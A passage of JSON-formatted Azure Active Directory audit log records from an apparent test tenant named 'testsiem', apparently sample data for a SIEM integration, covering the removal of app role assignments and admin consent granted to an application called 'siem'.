"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, 